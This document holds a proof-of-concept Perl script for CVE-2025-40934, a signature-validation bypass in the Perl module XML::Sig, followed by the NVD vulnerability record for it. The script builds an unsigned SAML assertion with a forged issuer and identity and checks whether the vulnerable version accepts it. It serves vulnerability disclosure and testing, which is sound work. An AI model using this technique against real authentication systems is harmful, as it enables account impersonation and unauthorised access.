CVE-2025-40934

#!/usr/bin/env perl use strict; use warnings; use XML::Sig; # CVE-2025-40934 PoC - XML-Sig Signature Validation Bypass # Affected versions: 0.27 to 0.67 # Create an unsigned XML document (simulating attacker removing signature) my $unsigned_xml = <<'XML'; <?xml version="1.0" encoding="UTF-8"?> <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" ID="_1234567890" IssueInstant="2025-01-01T00:00:00Z" Version="2.0"> <Issuer>https://malicious-issuer.com</Issuer> <Subject> <NameID>[email protected]</NameID> </Subject> <Conditions NotBefore="2025-01-01T00:00:00Z" NotOnOrAfter="2026-01-01T00:00:00Z"/> </Assertion> XML # Initialize XML-Sig verifier my $verifier = XML::Sig->new({ x509 => 1, cert => "./test_cert.pem", key => "./test_key.pem" }); # This should fail for unsigned XML, but vulnerable version returns true my $result = $verifier->verify($unsigned_xml); if ($result) { print "[VULNERABLE] Signature verification passed (INCORRECT!)\n"; print "[VULNERABLE] The unsigned XML document was accepted as valid\n"; print "[VULNERABLE] This indicates the system is vulnerable to CVE-2025-40934\n"; } else { print "[PATCHED] Signature verification correctly failed for unsigned XML\n"; print "[PATCHED] System is NOT vulnerable to CVE-2025-40934\n"; } # Additional check: Verify signature field is actually checked print "\n[INFO] Testing with properly signed XML for comparison...\n"; print "[INFO] If both tests pass, the verification logic is broken\n";

{"cve": {"id": "CVE-2025-40934", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2025-11-26T23:15:47.773", "lastModified": "2025-12-30T15:21:37.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XML-Sig versions 0.27 through 0.67 for Perl incorrectly validates XML files if signatures are omitted.\n\nAn attacker can remove the signature from the XML document to make it pass the verification check.\n\nXML-Sig is a Perl module to validate signatures on XML files.  An unsigned XML file should return an error message.  The affected versions return true when attempting to validate an XML file that contains no signatures."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xml\\:\\:sig_project:xml\\:\\:sig:*:*:*:*:*:perl:*:*", "versionStartIncluding": "0.27", "versionEndIncluding": "0.67", "matchCriteriaId": "8F401AE6-72AA-4188-B763-4354213AA0BB"}]}]}], "references": [{"url": "https://github.com/perl-net-saml2/perl-XML-Sig/issues/63", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/perl-net-saml2/perl-XML-Sig/pull/64", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking"]}]}}